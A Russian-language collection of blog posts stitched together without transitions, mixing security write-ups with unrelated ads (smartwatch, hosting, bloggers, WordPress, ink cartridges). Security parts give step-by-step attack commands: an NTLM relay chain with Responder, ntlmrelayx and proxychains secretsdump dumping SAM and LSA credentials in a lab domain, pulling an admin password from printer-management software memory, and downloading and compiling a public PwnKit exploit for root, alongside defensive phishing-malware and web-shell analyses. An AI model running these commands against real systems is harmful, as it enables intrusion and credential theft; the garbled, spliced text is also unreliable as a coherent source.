И всё никак не удавалось продемонстировать последствия такого недостатка в дикой среде. Скажем так, описывать его дольше, чем просто прочекать. А тут вот всё-таки собрался с мыслями, собрал стенд из нескольких виртуалок и решил продемонстрировать. Тем более, что получилось очень показательно.

Что за стенд

В качестве стенда буду использовать сборку Game of Active Directory. Скажу сразу – стенд очень прикольный, есть множество различных техник и потестить инструменты прям самое оно.

Установить его – отдельный квест, я пол-дня мучился, пришлось даже апгрейд компьютера делать, но оно того стоило. Если нужно будет, в отдельном посте расскажу как его разворачивать.

Итак, погнали дальше.

Как проверить требуется ли цифровая подпись пакетов или нет?

Лично я проверяю через CrackMapExec – этот инструмент стал уже настолько привычным, что уже наверное занимает 1-ое место в рейтинге моих любимых hack tool.

# crackmapexec smb 192.168.56.0/24

Указываем целую подсеть и ищем упоминания (signing:False). В нашем стенде всего 5 серверов. Однако в организации, как правило, там будут десятки и сотни узлов. Теперь бы хорошо список IP-адресов с отключенной цифровой подписью сохранить в файлик для последующего использования.

# crackmapexec smb 192.168.56.0/24 --gen-relay-list smb_sign_off.txt

У CrackMapExec существует отдельная опция, которая сохраняет найденные хосты с отключенной подписью в отдельный файл (в нашем случае – smb_sign_off.txt).

В чём суть атаки

Вспоминаем одну из статей, когда мы ловили хеш NetNTLM в сети через Responder. В общем виде напрямую использовать этот хеш через какой-нибудь Pass-the-Hash нельзя, только восстанавливать методом перебора через Hashcat.

Но скажем так, есть ещё один вариантик, в случае если отсутствует проверка подлинности отправителя (как раз цифровая подпись), можно перенаправить от своего имени хеш на целевую машину и выполнить произвольные действия от имени конкретного пользователя. Особенно уместно будет, если пользователь состоит в группе администраторов хотябы на каком-нибудь узле с отключенной проверкой цифровой подписи) На стенде как раз есть такая сборочка, но из опыта – в организациях тоже встречается нередко.

Собираем связку Responder + NTLMRelay

1. Для начала убедимся, что нам вообще есть что там ловить) а именно, циркулируют ли широковещательные запросы разрешения имён. Для этого запустим resonder на прослушивание интерфейса.
   # responder -I eth1
   (где eth1 – интерфейс, смотрящий в корпоративную сеть)

   Внимание, эта процедура в режиме “poisoning” может навести шороху в сети и вызвать проблемы с некоторыми сервисами)

   Должны через некоторое время увидеть что-то типа такого:

   Пролетел хеш NTLMv2 пользователя NORTH\eddard.stark. Мы можем уже повесить его на перебор, а можем…. (читать дальше).
   Вот что мне нравится в этом стенде – там на уровне запланированной задачи запрограммировано, что будет пролетать два хеша. Один – обычного пользователя, с легким паролем, который можно подобрать. Второй – с паролем юзера с правами админа, пароль сбрутить нереально. Так что долго ждать не придётся. Ну ладно, сейчас проведём атаку.

2. Отменяем респондер и идём в его конфиг: (/usr/share/responder/Responder.conf)
   Нам нужно отключить запуск SMB и HTTP-серверов при старте. Чтобы не было конфликта с NTLMRelay. Сохраняем конфиг и идём дальше.
3. Далее я для удобства разобью консоль на три экрана – при помощи tmux.
   
4. В первом экране запустим NTLMRelayX из состава Impacket (сейчас уже есть “из коробки”, но можно скачать с гитхаба)
   # ntlmrelayx.py -tf smb_sign_off.txt -of hashes -smb2support -socks
   где -tf – путь к файлу целей (хосты с отключенной проверкой цифровой подписи), -of – выходной файлик, куда полетят хеши; -socks – режим проксирования, когда поднимается socks-сервер и через который можно перенаправлять запросы. Обратите внимание на каком порту он поднялся, я подвёл
5. Во втором окне стартуем Responder тот же самый, ожидаем захват хеша
   # responder -I eth1
   
6. Когда хеш наконец пролетит, ntlmrelay проще говоря попробует прозрачно авторизоваться на каждой из целевых систем (в списке IP всего 2 станции), а также создаст socks-подключения к каждой из них, в случае успеха.
   Для проверки введём в окне ntlmrelayx команду “socks” и увидим куда можно проксироваться, под какой учётной записью и есть ли у нас права администратора:
   Повезло! Есть одна админская учётка. Мы не знаем её пароль, только NTLMv2-хеш, который ещё нужно подобрать (но мы не будем). Также не сможем по NTLMv2 выполнить Pass-The-Hash. Но это и не надо.
7. Проксируемся! Для этого используем штатный proxychains, которые требуется чуток поднастроить.
   Открываем конфиг: /etc/proxychains4.conf
   И прописываем там наш порт – в случае с ntlmrelayx – 1080 (я обводил на скрине выше). Ну ещё можно раскомментировать строчку quiet_mode, чтобы не моросили служебные сообщения в консоль. Я лично не люблю) Да, кстати, Responder уже можно выключить!
8. Проксируемся!
   # proxychains secretsdump.py -no-pass NORTH/EDDARD.STARK@192.168.56.22
   Если всё сделано правильно – вот нам и дамп SAM-базы пользователей, с NT-хешем локального администратора (вот его уже можно PtH-кнуть).
   Дальше DCC2-кеширование учётки (брутить смысла нет – слишком сложное шифрование, скорость будет – ну тока ТОП10к паролей проверить разве что.
   И ниже будет ещё дамп LSA-кредсов,
   Вон, даже пароль SPN-учётки “sql_svc” в открытом виде – пароль длиннющий, перебрать невозможно будет. Кстати, не помню, писал ли про SPN-учётки или нет, но напишу. Механизм – огонь!
9. Всё, точка уже хакнута – есть права админа. Кроме secretsdump можно использовать и другие утилиты, тот же lsassy, donpapi и т.д. Всё, где можно авторизоваться.

Проверил вот Pass-the-Hash через CrackMapExec – сработало) Драгоценная “Pwn3d!” ) Можно почудить.

Вот такая вот история. Надеюсь, было хоть немного, но интересно!

Инструмент называется PingCastle, больше полезен тем, кто знает английский язык, ибо результаты работы написаны в основном на нём. Но это не беда, ведь в техническом английском все слова из C++ Отчасти механизм похож на Bloodhound, о котором я уже писал. И скоро будет ещё один материал – немного подразобрался, инструмент реально занятный.

С документацией можно ознакомиться на официальном сайте, а мы сейчас разберём базовый пример.

Итак, предположим, что программу уже скачали себе на компьютер. Теперь возможны два варианта. В первом случае – мы сторонний пентестер, работаем со своего ноутбука.

Запустить приложение нужно от имени существующего пользователя (поэтому нам потребуется хотябы одна пользовательская учётная запись).

Как запустить командную строку от имени пользователя?

Для начала убедимся, что на просмотр сетевых ресурсов контроллера домена у нас не хватает прав (мы со своего устройства – “неавторизованный пользователь”).

Далее, запускаем командную строку от имени доменного пользователя:

C:\ runas /user:login@domain /noprofile /netonly cmd.exe

Вводим пароль этого пользователя и у нас открывается новое окно cmd.exe, в заголовке которого виднеется информация, что запущена она от имени login@domain.

В нём же можно проверить снова командой net view видимость сетевых ресурсов на Domain Controller – в этом случае результат уже другой:

Следующий шаг, а также если мы действуем как пользователь домена – запуск непосредственно PingCastle:

Стрелками и нажатием кнопки Enter выбираем интересующий нас пункт. Для нас сейчас интересен “1-healthcheck”.

Далее вводим имя домена для сканирования и дожидаемся результатов. Результаты по умолчанию вываливаются в тот же каталог в виде HTML-отчёта:

Вообще отчёт ооочень длинный, можно разворачивать разделы и читать описания выявленных недостатков:

Я думаю, что не лишним будет пробежаться по основным пунктам и прикрыть то, что несложно прикрыть. Ведь злоумышленники обычно действуют примерно по такому же принципу – ищут то, что забыл сделать администратор и пролезают в эту дырочку.

На сайте уже публиковалась уже статья про Интернет контроль сервер:

Приятно видеть, что отечественное программное обеспечение укрепляется на рынке инфобеза, что подталкивает к развитию всю отрасль.

Так вот, эти ребята запланировали вебинар на тему “ИКС – NGFW-решение для миграции и обеспечения информационной безопасности“. Если есть возможность – обратите внимание. Мероприятие бесплатное. Будет розыгрыш подарков, вкусные условия для приобретения лицензий и многое другое!

Во время вебинара мы с вами также:

1. Получим информацию о быстрой миграции с программ класса UTM и NGFW и комплексном обеспечении информационной безопасности.
2. Рассмотрим функциональные возможности ИКС и главные преимущества решения.
3. Также узнаем, как легко перейти на универсальное российское ПО, защитить корпоративную сеть от всех типов угроз и эффективно закрывать ИТ-задачи компании.

Ну а по содержанию вебинара – будет полезно прежде всего тем, кто обеспокоен импортозамещением и интеграцией отечественного ПО. То есть чуть менее, чем все) В любом случае это может быть полезно – узнать, что происходит в секторе, позадавать вопросы и закрыть какие-то возможные белые пятна. Побольше бы таких мероприятий.

Для чистоты эксперимента решено было использовать только мисконфиг, без боевых эксплойтов, например, против бородатой MS17-010. Тем более, что по заверениям приятеля всё это они уже давно пропатчили.

Итак, погнали! Я не буду описывать полный кейс, лишь хочу отметить, что некогда описывал один вектор как нечто весьма спецефичное. Но, как выяснилось, это ни капли не единичный сценарий.

Описывалось тут:

Как опасные настройки МФУ помогли получить привилегии администратора

Кейс повторился “с точностью до муллиметра”. В ходе инвентаризации был обнаружен ряд МФУ небезызвестной марки.

Как всегда – дефолтный пароль. Иду в адресную книгу и вижу:

Создан какой-то адрес. Уже ручки зачесались поскорее посмотреть, что там вбито.

Традиционно – общий каталог, учётка и пароль (вытащить который из веб-интерфейса не представлялось возможным). Смутило (а точнее заинтересовало) то, что учётка оканчивалась на многообещающее “….admin”. Не, ну конечно, может быть заведено что-то типа “scan-admin”, общая учётная запись, прав у которой хватает лишь на то, чтобы записывать в общий каталог на сервере. Это было бы вполне себе нормально, думаю.

Качаем с Интернета Kyocera Net Viewer, коннектимся к нашей МФУшке.

Радость в том, что теперь пароль в оперативной памяти процесса, откуда его можно поддёрнуть уже известными средствами. Уже известные средства у меня под рукой не оказались. Но тут я вспомнил, что достаточно неплохой Hex есть в программке, знакомой моему поколению геймеров – ArtMoney. Качаем, запускаем. Подключаемся к процессу KYOCERA Net Viewer и ищем строковую переменную с именем пользователя.

Нашлось с десяток вхождений. Будем открывать каждое и смотреть, подходит ли оно визуально под XML-структуру.

На втором же вхождении видим примерно следующее:

И как всегда, пароль в открытом виде. Копируем, проверяем права на шаре при помощи CrackMapExec. И …. бум! Видим заветное (Pwn3d!). То есть на шаре имеем права локального администратора (а также не только на этом хосте, но и на многих других). Пока не в домене. Но и этого вполне достаточно. Открываю проводник от имени этой учётной записи и лезу к своему товарищу на рабочий стол. ))

Дальше мы решили раскрутить темку, посмотреть как далеко может зайти изначально непривилегированный пользователь. Ну а пока – некоторые выводы.

Некоторые выводы

1. То, что раньше казалось единичным кейсом – вполне может быть широко распространённой практикой.
2. Прописывать в принтера или куда-либо ещё админские учётки – плохо. Сделайте отдельного пользователя (нескольких, в группу) и этой группе нарежьте минимально необходимые привилегии.
3. Дефолтные логин-пароль в принетре/МФУ – плохо. Все массовые сканеры проверяют их со скоростью пули. А если кажется, что во взломе МФУ нет ничего страшного – то уж как минимум временный вывод из строя печатающего устройства – это может стать настоящей головной болью, для решения которой придётся потопать ножками (по сети уже может не войдёте).
4. Подручные инструменты вроде того же ArtMoney вполне сойдут за Hex-редактор )) Just for fun.
5. Без сильной необходимости вообще вывешивать административный интерфейс какого-либо оборудования в ту же сеть не надо. Вопрос времени, когда его сломают.

На помощь пришла старенькая, миниатюрная (около 600 Кб), но от этого не менее функциональная программа: WinDirStat.

При запуске выдаёт окно, в котором можно выбрать определённый локальный диск (или даже конкретный каталог).

После этого программа начинает рекурсивное сканирование диска и достаточно быстро нарисует вот такую наглядную картинку:

Соответственно, чем больше по размеру прямоугольник – тем больше он отъедает свободного места. Всё кликабельно – справа есть категорирование по типам файлов, слева вверху – по каталогам.

Действуем согласно правилу Парето: удаляем наибольшие по объёму наименее нужные файлы, прям там же из контекстного меню.

За считанные минуты можно освободить большое количество дискового пространства, да и просто наконец найти что-то “тяжелое”, что потерял когда-то)

– …прислали письмо подозрительное, во вложении 7z архив с паролем. Пароль в том же письме)

Ну быстро смекнув, что к чему, говорю – открой архив, всё нормально, можно смело запускать любые вложения из-под админа и с отключеным антивирусом. Посмеялись, но через пару минут он пишет – а внутри действительно только PNG-изображение.

– Чё?

Не, я конечно писал уже про RARJPEG и возможность упаковать в медиафайлы что-то, помимо самого медиа. Но тут PNG.

А точно ничего больше нет? – мысленно уже напрягся, думал, может какой зиродей в просмотрщике штатном проморгали….

– ну ещё ярлык.

Фуффф…. В нём дело. – Скинь свойства:

Понятно) Вообще можно не привязываться было к (якобы) безобидности формата PNG – он тут совсем не при чём. Просто тушка скрипта исполняется встроенным интерпретатором серверных сценариев CScript. Не так, чтобы часто встречалось. Запросил копию письма, смотрю сам, что в архиве:

Открываем редактором PNG-шку:

Мда. Типичный скрипт. А внизу целая простыня из закодированного (не base64, а кастомный алгоритм) содержимого. Лень разбираться в блокноте, загнал все функции и пейлод в консоль браузера Chrome, там выполнил в JS.VM и вывел раскодированный пейлод в консоль:

Тут уже VBScript, который паковался бы в созданную книгу Excel на одном из предыдущих этапов.

В VBS-е тоже кодированый EXE-шник, импорт функций для аллокейта памяти и создания процессов, куда передаётся этот пейлод. Кароче уже не так интересно, но всё-таки любопытно:

Можно чуть дальше шагнуть, перевести десятичные значения в хекс и в бинарный формат, получить тело вредоноса. Может быть в свободное время займусь. Но там не просто тупо EXE, так как не увидел характерную сигнатуру MZ… в начале. Хотя может там есть какой-нибудь шаффл или сдвиг, или ксор, да мало ли что ещё)

Выводы:

1. Большинство вторжений в организации начинается именно с пробития периметра через электронную почту. Это нужно помнить.
2. Даже, если в письме нет EXE-файла, там всё ещё может быть вредоносный скрипт, который соберёт сам себя, используя встроенные средства.
3. В случае, подобном этому, в качестве хранилища скрипта мог быть использоваться и совсем безобидный файл – хоть TXT (хотя палево, легко открыть), расширение роли не играет – он выступает только в качестве контейнера.
4. Возможно имеет смысл ограничить работу CScript/WScript у себя, кто-то вообще легитимно использует их возможности?
5. Самое опасное – ярлык) Вообще там могло быть что угодно, поэтому запускать ярлык даже с безобидной иконкой (paint) не стоит.

Что думаете?

Как же обеспечить такое подключение?

Программные средства

Не буду описывать все возможные варианты, их конечно бесчисленное множество. Расскажу именно о тех, с которыми работал лично.

Linux Deft (варианты v5, Zero,

Дистрибутив LiveCD Linux для криминалистических исследований (один из многих). Отличительной особенностью является включенная блокировка записи на подключаемые накопители “из коробки”. То есть подключите флешку или диск – записать на них ничего не получится, только читать. Принудительно, для определенного устройства эту защиту можно выключить (ну а иначе не получилось бы снимать образ флешки на какой-нибудь внешний USB-HDD).

Дальше – подключаем флешку и в проводнике видим следующие варианты:

1. Monut Volume – монтирование в R/W режиме (опасно). В этот режим переводим свой накопитель, на который нужно поместить образ.
2. Mount in protected mode (Read Only) – по определению.

После того, как флешка подмонтирована – идём уже по известному пути:

# dd if=/dev/... of=...

либо, что мне больше нравится – ddrescue

Windows

Создаём раздел реестра (если нет):

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\RemovableStorageDevices\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\

Создаём параметр: Deny_Write (Dword32) = 1

Перезагружаем систему (вопреки расхожему мнению, что мол, будет работать сразу).

Подключаем накопитель и пробуем записать (или удалить) с него что-нибудь:

Ну и дальше снимаем образ флешки или что мы там ещё хотели делать? Кстати, упомянутая ddrescue есть и под Windows (проект Cygwin), запилю как-нибудь статейку отдельную.

Аппаратные средства

Вот тут начинается самое интересное – наибольшей защитой (кмк) обладают именно аппаратные средства, блокирующие операции записи на уровне встроенного контроллера.

Например вот такое:

Взял поиграться)

Работает просто – подключаем флешку, подключаем к хосту, даём питание – и на хост прокидывается эта флешка в режиме “только чтение”.

• Интеграция с git.
• Простота развёртывания и работы.
• Opensource желательно, либо недорого.
• Приятный графический интерфейс.
• Многопользовательская, возможность нарезать задачи, вести переписку, писать документацию, делегировать, проверять.
• Возможность одновременно вести несколько проектов.

Функции не так, чтобы сильно “бородатые”, можно было заморочиться и написать самому, но вдруг что-то готовое уже есть? И посоветовали мне посмотреть на Gitea. (демка тут)

То, что нужно!

Первая мысль была

“Да моб твою ять!! как же я раньше без этого жил?”

И слёзы счастья, что мудохался несколько лет с несколькими программами параллельно в несколько окон. Разработка в одном месте, консольный git в другом окне, планировщик – отдельно. И рабочий чат. И для документации – отдельное окно Markdown редактора.

Установка и настройка

1. Качаем под свою платформу: https://dl.gitea.io/gitea (1.17.3 текущий релиз, не рекомендую брать development branch – жутко глючит и крашится).
2. У меня уже развёрнут MySQL под другие проекты, так что просто создаю БД под gitea.
3. Запускаем инсталлятор и переходим на страницу установки: http://localhost:3000
4. Следуем простым инструкция и всё готово за считанные минуты.

Дальше всё зависит от вашей работы. Я создал репозиторий, проекты, завёл пользователя. Создал свои метки и этапы проекта.

Выглядит как вполне приличный Github.

Отслеживание активности пользователей:

Страница Wiki (не люблю писать документацию, но надо. В общем всё тоже тут есть, достаточно неплохой визуальный редактор).Кароче, на текущий момент эта тема закрывает 100% необходимых задач и я очень доволен. Кроме того, на любой коммит можно выпустить релиз, который автоматически упакует исходники в популярные типы архивов, покажет необходимые пояснения и вообще выглядит вполне достойно.

Пока продолжаю пользоваться, может кому-то тоже будет интересно посмотреть!

Уязвимость состоит в возможности переполнения буфера дополнительными заголовками ответа ping и, как следствие, вероятность выполнить произвольный код у себя в системе с правами root просто пропинговав “заряженный” злоумышленниками хост.

Возможность дальнейшей реализации может быть затруднительна, но тем не менее, публикация таких новостей помогает подсветить очень важные моменты.

1. Думаете, ваша среда/система безопасна? Просто пока не нашли (не обнародовали уязвимость).
2. Уже давно бы всё нашли? Да просто не искали особо (не думали, что это важно).
3. Старые инструменты – проверенные временем. Ну раньше писали не учитывая тот опыт, который есть сейчас – новые вектора атак, особенности взаимодействия с современными инструментами.
4. Защищаемся только от внешних атак. Внутри всё хорошо. И как показала данная уязвимость, проблемы могут возникнуть даже при казалось бы безобидных действиях.

Патч на ping доступен, можно перекомпилировать.

Ну и конечно, интереснее всего PoC, как я понимаю, это будет какая-то модификация пакетов на уровне сервера.

Устойчивые к нагрузкам и воде

Часы весят чуть больше 60 г. Корпус широкий, массивный. Материал изготовления – титан, поэтому они выглядят внушительно, но почти не ощущаются на руке. Циферблат изготовлен из сапфирового стекла. В официальном ролике-презентации производитель показывал восхождение альпиниста, у него эти часы бились и царапались о камни, но остались без повреждений. Ремешки выпускаются в трёх дизайнах: два текстильные – для гор и регулируемый для бега, один силиконовый для плавания.

Часы выдерживают большой диапазон температур: от -20 до +55 градусов. Надёжность apple-watch-ultra подтверждается полученным сертификатом MIL-STD-810H военного класса. Такой документ выдаётся только после прохождения полевых испытаний. Проверяется устойчивость оборудования к перепадам температуры и давления, осадкам, повышенной влажности, песку и пыли, перегрузкам во время ускорения, вибрации.

С Apple Watch Ultra можно погружаться под воду на глубину до 40 метров. Это предельный показатель для спортивного и рекреационного дайвинга. В режиме погружения на дисплее отображается компас и температура воды.

Новый дисплей и звук

Дисплей в часах имеет диагональ 1,92 дюйма. Циферблат Wayfinder оснащён восемью виджетами. Доступен ночной режим: достаточно повернуть кнопку Digital Crown, и включится ночной режим: красный шрифт на черном дисплее. В OLED-матрице пиксели не подсвечиваются, за счет этого часы удобно использовать в темноте. Днём яркости дисплея тоже хватает, чтобы беспрепятственно видеть всё, что нужно, тоже благодаря встроенной OLED-матрице.

Качественнее стал звук. Часы оснащены тремя микрофонами, функцией шумоподавления и двойным динамиком. Время работы на одном заряде выросло с 18 до 36 часов по сравнению с обычными моделями. Аккумулятор увеличен до 542 мАч, так что в режиме экономии часы могут работать до 4-5 дней.

Возможности смартфона

Apple Watch Ultra – это почти iPhone. С ними можно тренироваться, ездить на велосипеде и мониторить сон, пользоваться приложениями и голосовым ассистентом, наслаждаться красивым интерфейсом. Часы считают шаги, следят за уровнем кислорода в крови, температурой и сердечным ритмом, делают ЭКГ, умеют отслеживать падения и ДТП.

С часами всегда и практически везде вам будет доступна сотовая связь и доступ к сбережениям – переводить деньги и оплачивать покупки стало проще. Вы можете оставаться на связи до 18 часов в течение всего дня даже без подзарядки батареи. У вас будет доступ к любимой музыке, подкастам и аудиокнигам в потоковом режиме. Можно прокладывать маршруты и отмечать точки, где вы были, на карте, смотреть погоду. Достаточно подключить все часы в семье к одному iPhone, и полный набор функций будет доступен каждому из вас.

Серия Apple Watch Ultra создана для людей, привыкших жить активно, но не готовых отказаться от комфорта. Производитель часов доказал: необязательно отказываться от удобств, даже отправляясь в горы или ныряя с аквалангом.

И вот решил покзаать, среди прочего, как можно быстро использовать эту возможность. Чисто в ознакомительных целях, разумеется.

Итак, имеем CentOS 7.9 “из коробки”. Единственное требование – установленный компилятор “gcc”, но если админ собирал какие-то модули прямо на серваке, то 99% там уже будет установлено всё, что вам нужно.

Исходный код эксплойта уже есть много где, достаточно погуглить CVE-шку и ключевое слово “PoC” (Proof of Concept). Я же нашёл вот ссыль: https://raw.githubusercontent.com/arthepsy/CVE-2021-4034/main/cve-2021-4034-poc.c

Качаем любимым способом:

$ wget https://raw.githubusercontent.com/arthepsy/CVE-2021-4034/main/cve-2021-4034-poc.c

Компилируем исходник во что-нибудь с непримечательным именем. Я компильну так:

$ gcc cve-2021-4034-poc.c -o litladmin_exploit

и файл появится в текущем каталоге с исполняемым флагом. Кстати, в отсутствии компилятора всегда можно собрать файл на другом серваке и просто закачать его туда.

После запуска файла увидим изменение контекста и … у нас права рута. Та-дамс!

Кстати, можем не получать интерактивный шелл, а просто выполнить некоторые команды от имени рута. Достаточно немного поменять шелл-код в исходнике:

Как защититься?

Обновляем систему в общем (yum update -y) и polkit в частности (yum install -y polkit).

Steadyhost предлагает различные услуги, включая виртуальный хостинг, реселлерский хостинг, vps-хостинг и выделенные серверы. Они также предлагают широкий спектр возможностей, таких как неограниченная пропускная способность, учетные записи электронной почты и базы данных mysql.

Есть много причин выбрать steadyhost в качестве хостинговой компании. Они работают уже более 10 лет и имеют репутацию надежной компании с отличным обслуживанием клиентов. Они предлагают широкий спектр услуг и функций, а их цены очень конкурентоспособны.

Steadyhost предлагает различные тарифные планы, которые удовлетворят ваши потребности. Их планы виртуального хостинга начинаются от $4,95 в месяц за базовый план, который включает 1 гб дискового пространства и 10 гб пропускной способности. Планы для реселлеров начинаются от $19,95 в месяц за базовый план, включающий 20 Гб дискового пространства и 200 Гб пропускной способности. Планы vps начинаются от $29,95 в месяц за базовый план, который включает 30 гб дискового пространства и 500 гб пропускной способности. А тарифные планы выделенных серверов начинаются от $99 в месяц за базовый план, включающий 100 гб дискового пространства и 1000 гб пропускной способности.

Если вы находитесь в поисках новой хостинг-компании, возможно, вам интересно узнать о компании steadyhost. В этой статье мы рассмотрим некоторые отзывы о steadyhost, чтобы узнать, что говорят клиенты о своем опыте.

В целом, отзывы о компании steadyhost положительные. Клиенты высоко оценивают гарантию бесперебойной работы компании и дружелюбное обслуживание клиентов. Многие клиенты также говорят, что они довольны соотношением цены и качества.

Есть несколько негативных отзывов, но они, похоже, в меньшинстве. Некоторые клиенты жаловались на проблемы с выставлением счетов и настройкой аккаунта. Тем не менее, стоит отметить, что большинство из этих отзывов все же говорят, что рекомендовали бы steadyhost другим.

В целом, похоже, что steadyhost — хороший вариант, если вы ищете новую хостинг-компанию. Обязательно прочитайте несколько отзывов, прежде чем принять окончательное решение, но, похоже, что steadyhost — хороший выбор для многих людей.

Если не хотите заниматься этим вопросом самостоятельно, обратитесь в блогерское агентство. Специалисты подберут аккаунты, которые подойдут по решению проблем именно ваших маркетинговых целей.

Насколько выгодно заказывать рекламу у блогеров

Реклама у блогеров может быть разной. Среди основных типов:

• пост в ленте;
• пост рекламный;
• пост в рекомендациях;
• сторис;
• клип.

От выбранного способа рекламы, а также самого аккаунта зависит цена на услугу. Ее уточнять лучше в индивидуальном формате. Вне зависимости от стоимости можно быть уверенным в положительном результате. Реклама у блогеров имеет сразу несколько сильных сторон:

1. Не заставит себя ждать. Аудитория блогера (если он хорошо раскручен) практически сразу реагирует на рекламу. Поэтому заявки, заказы вам начнут поступать сразу же после публикации рекламного материала.
2. Дает возможность воздействовать на целевую аудиторию. Главное — подобрать аккаунт с нужной тематикой. Например, если вы продаете резиновые ленты для силовых тренировок, следует выбрать спортивного блогера.
3. Остается доступной по цене. Ее позволить себе могут как владельцы крупного, так и среднего, малого бизнеса. И что самое главное — она очень быстро окупается.

С помощью рекламы у блогеров можно получить прямые переходы на свой сайт, страницу товара в интернет-магазине или аккаунт в социальной сети. Если вы заказываете клип, сторис или пост, обязательно продумайте, каким образом будет подаваться информация. Она должна вовлекать аудиторию, побуждать ее к определенным действиям. В таком случае реклама будет действительно эффективной.

Все товары и услуги нуждаются в продвижении. Именно благодаря этому вы сможете повысить свои продажи. Оптимальное решение для рекламы — обратиться к блогерам. Они имеют целевую аудиторию, которая доверяет. Поможет вам подобрать подходящий аккаунт агентство по работе с блогерами. Подробности по поводу порядка сотрудничества уточняйте индивидуально во время консультации.

Научиться работать с системой поможет учебник по WordPress. С его помощью вы узнаете, какие возможности дает платформа для создания классных сайтов совершенно бесплатно. Также в материалах содержится практическая информация о настройках и оптимизации крупных проектов.

Особенности платформы WordPress

Система для создания сайтов WordPress с каждым годом становится все популярнее. Это обусловлено следующими плюсами платформы:

• подходит для создания сайтов любой сложности. Для использования предлагаются десятки тысяч тем, регулярно появляются новые. Это позволяет создавать веб-ресурсы под любые потребности. При этом проекты не будут однообразными: подборка тем для WordPress очень разнообразна;
• использовать платформу могут даже те, у кого нет опыта или знаний программирования. Разобраться в функционале достаточно просто — нужно только изучить инструкции;
• CMS считается достаточно безопасной и защищенной. Система постоянно обновляется, что позволяет предотвратить угрозу кибер-атаки. Повысить уровень защиты также помогают правильно подобранные плагины;
• на платформе используется программное обеспечение с открытым кодом. Это значит, что редактировать, вносить свои изменения может любой разработчик. Благодаря этому система постоянно тестируется и совершенствуется специалистами, работающими на энтузиазме;
• сайты, созданные на WordPress, могут без проблем работать даже на недорогом хостинге. Выбирая тариф, важно ориентироваться именно на предполагаемую нагрузку на ресурс. В таком случае он будет работать исправно, без внутренних ошибок.

Сайт — современный инструмент маркетинга. С его помощью можно продавать товары, информировать клиентов о действующих акциях и скидках, повысить покупательскую активность, узнаваемость бренда.

Если вы задумываетесь о создании собственного веб-ресурса, обратитесь к платформе WordPress. Здесь есть все необходимые инструменты и настройки для получения действительно качественного и функционального сайта. Разобраться с системой вы сможете даже в том случае, если у вас нет опыта и знаний.

Итак, бэкдор представляет собой файл 01.php, лежащий в каталоге /uploads/ как бы уже намекая путь проникновения.

Обращаюсь к нему и вижу:

Сперва не обратил внимание, ну 404-ая ошибка. Ладно. Хотя странно. Откроем код:

Чтоооо? Помимо захардкоженного MD5-хеша (пароль доступа, не root, кстати). Здесь прямым текстом выводится содержимое той самой Not found странички. Аа-аа )) так это залепуха. А вон внизу и инпут для пароля. Ну-ка, проверим:

И правда) Поле для ввода пароля есть. Попробовал побрутить MD5-хеш на hashcat, но ничего не подобралось до 7 знаков, а дальше сроки выросли очень сильно. Решено было не мучать железо, а поменять захардкоженый хеш на что-нибудь известное прямо в бэкдор-скрипте

Вот такой вот веб-шелл… Чтож. Примечательно то, что он не англоязычный, загуглил пару характерных фраз из исходника:

Определило Индонезийский язык. Первый намёк принят.

Следующая часть исходника была закодирована в base64 – один из любимых методов злоумышленников. Раскодируем прямо в Notepad++:

Так как в исходнике была функция mail, поднимем почтовые логи и грепаем этот почтовый адрес. Выходим на IP-шник:

Снова Индонезия.

Что ещё есть в исходнике?

Ссылки на какой-то хак-портал, где публикуют свои дефейсы куча киберпреступников. Есть и удобный поисковичок.

Устраняем последствия

Вычистим все скрипты

Выполнил поиск подозрительных имён файлов, скриптов. А также всех файлов, созданных в интересующие даты. Удалил.

Запретим выполнение скриптов из каталога uploads

Создал .htaccess следующего содержания, залил в каталог. Проверил работу.

php_flag engine 0
RemoveHandler .phtml .php .php2 .php3 .php4 .php5 .php7 .phps .cgi .pl .asp .aspx .shtml .shtm .fcgi .fpl .htm .html
AddType text/plain .phtml .php .php2 .php3 .php4 .php5 .php6 .php7 .phps .cgi .pl .asp .aspx .shtml .shtm .fcgi .fpl .htm .html

Вот такая вот история. Очевидно, в самописном движке сайта есть какая-то уязвимость, которую обнаружили злоумышленники. И будут пытаться пробивать дальше. Хорошо, если единственная возможность записи будет только в uploads, таким образом по крайней мере PHP-бэкдоры удастся придушить. Будем посмотреть.

• цвет текста и изображений стал менее насыщенным;
• устройство перестало печатать;
• после недавней замены краски прибор сигнализирует, что она закончилась.

Восстановить засохший картридж можно нескольким способами. Эксперты компании «Расход» подробно расскажут о каждом из них.

Использование разжижителя

Расходник, неспособный выполнять свои функции, постепенно скапливается в выходных соплах. Чтобы их прочистить и вернуть чернила в исходное состояние, используют специальную жидкость. Её объём зависит от количества краски, которая находится внутри картриджа. Найти разжижитель в продаже не так просто. Однако его вполне можно заменить подручными средствами.

Бытовые способы

Восстановление работоспособности картриджа в домашних условиях также начинается с очищения сопла. Но на этот раз уже с помощью растворителя. Проводить процедуру нужно очень аккуратно, чтобы он не попал внутрь. Для разжижения существует несколько вариантов раствора:

• нейтральный — смесь спирта, воды и глицерина. Подойдёт для очистки всех расходников.
• щелочной — соединение спирта, аммиака, воды и глицерина. Используют для расходников фирм Epson и Canon.
• кислотный — смесь спирта, уксусной кислоты и дистиллированной воды. Можно применять для большинства картриджей.

Если химические эксперименты не ваша сильная сторона, можно купить средство «Мистер Мускул» голубого цвета. Он не хуже домашних составов справится со своей задачей.

В качестве альтернативы подойдёт очистка паром. Чтобы получить результат, достаточно будет 5-10 секунд подержать сопло у носика кипящего чайника или парогенератора.

Рекомендации по чистке

• Первый этап — очищение сопла. Без него засохшие чернила не позволят составу проникнуть внутрь.
• Выбирайте только проверенные растворы и средства. Отдавайте предпочтение специализированным составам.
• Проводите очищение в средствах индивидуальной защиты. Используйте респиратор, перчатки, а также очки.
• Не переворачивайте контейнер с краской. Из него может вытечь оставшаяся жидкость.

Профилактика засыхания

Бывают ситуации, когда даже профессиональное средство не способно справиться с проблемой. Тогда единственным возможным вариантом станет замена расходного материала.

Чтобы избежать такого развития событий, соблюдайте несколько правил:

• выбирайте картриджи с максимальным сроком годности;
• не размещайте принтеры и другие печатные устройства рядом с батареями, тепловыми пушками, обогревателями;
• защищайте технику от прямого попадания солнечных лучей;
• избегайте негативного влияния сквозняков, кондиционеров и вентиляции;
• не герметизируйте сопла.

Лучше всего размещать печатную технику в затемнённых и прохладных местах. Если вы понимаете, что не будете использовать оборудование продолжительное время, закройте отверстия для краски специальными пробками. Это позволит сохранить расходники в рабочем состоянии и избавит вас от необходимости проводить процедуру чистки или замены.

Источник: https://rashod.ru/

